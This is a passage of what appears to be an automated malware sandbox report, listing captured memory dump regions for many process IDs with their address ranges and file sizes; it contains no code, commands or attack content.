                                                                                                                                                                                                                                                                                                                                                                                            • memory/532-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/572-114-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              172KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1000-276-0x000002CF77680000-0x000002CF776F0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1016-287-0x000001B505AA0000-0x000001B505B10000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1088-269-0x0000017E96E40000-0x0000017E96EB0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1160-299-0x0000022DF75D0000-0x0000022DF7640000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1300-302-0x000001C147140000-0x000001C1471B0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1392-282-0x000002735DE80000-0x000002735DEF0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1484-141-0x00000000022B0000-0x00000000022B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1484-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/1484-149-0x00000000022B4000-0x00000000022B5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1484-150-0x00000000022B5000-0x00000000022B7000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1484-148-0x00000000022B2000-0x00000000022B4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1600-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/1600-140-0x00000000010B0000-0x00000000010B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/1888-288-0x000001E87A760000-0x000001E87A7D0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2512-264-0x000002BC06040000-0x000002BC060B0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2520-256-0x0000021993960000-0x00000219939AB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              300KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2520-257-0x00000219941D0000-0x0000021994240000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2540-146-0x0000000002480000-0x0000000002482000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2540-151-0x0000000002485000-0x0000000002486000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2540-147-0x0000000002482000-0x0000000002484000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2540-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2696-277-0x000002BE73F00000-0x000002BE73F70000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2728-304-0x0000014AF8940000-0x0000014AF89B0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2748-306-0x000002AD03380000-0x000002AD033F0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/2796-119-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2848-123-0x00000000023E0000-0x00000000023E2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/2848-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3476-186-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/3984-265-0x0000020418F70000-0x0000020418FE0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4004-131-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4004-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4136-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4220-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4340-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4348-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4348-171-0x00000000009D0000-0x00000000009D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4348-173-0x0000000002C90000-0x0000000002C91000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4348-176-0x00000000051F0000-0x00000000051F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/4384-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4428-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4468-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4544-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4564-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4680-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4860-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/4960-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5124-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5344-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5344-221-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5416-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5620-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5676-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5792-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5836-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5928-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/5944-259-0x0000000004270000-0x00000000042CC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              368KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5944-253-0x000000000088A000-0x000000000098B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/5944-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/6108-331-0x0000020BF3600000-0x0000020BF3701000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/6108-283-0x0000020BF0FD0000-0x0000020BF1040000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              448KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/6108-246-0x00007FF6535E4060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/6356-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/6728-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/6832-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/6920-163-0x0000000002270000-0x0000000002272000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/6920-191-0x0000000002274000-0x0000000002275000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/6920-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/7068-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/7072-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/7164-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/7164-175-0x0000000000490000-0x00000000005DA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.3MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/7164-174-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              64KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/7264-275-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/7568-296-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/7728-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/7812-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/7812-322-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              40.0MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/7812-320-0x0000000002C00000-0x0000000002D4A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              1.3MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/7868-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/7912-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8016-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8068-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8068-319-0x0000000000540000-0x000000000054C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              48KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8104-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8140-334-0x0000000000400000-0x000000000041C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              112KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8140-344-0x0000000004F00000-0x0000000005506000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              6.0MB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8140-345-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8140-340-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8140-339-0x0000000004FC0000-0x0000000004FC1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8140-338-0x0000000005510000-0x0000000005511000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8140-335-0x00000000004163C6-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8160-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8212-315-0x0000000000402F68-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8212-314-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              48KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8252-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8264-317-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8360-318-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8416-323-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8416-325-0x0000000000430000-0x00000000004DE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              696KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8416-324-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              64KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8516-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8600-329-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8600-328-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8652-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8652-341-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8652-348-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8652-333-0x0000000003930000-0x000000000396C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              240KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8652-346-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8652-343-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8652-342-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8652-347-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8656-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8888-351-0x0000000000800000-0x0000000000801000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                                                            • memory/8888-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8908-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8992-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/8996-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/9032-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/9156-363-0x00000000004163C6-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                            • memory/9188-361-0x0000000000000000-mapping.dmp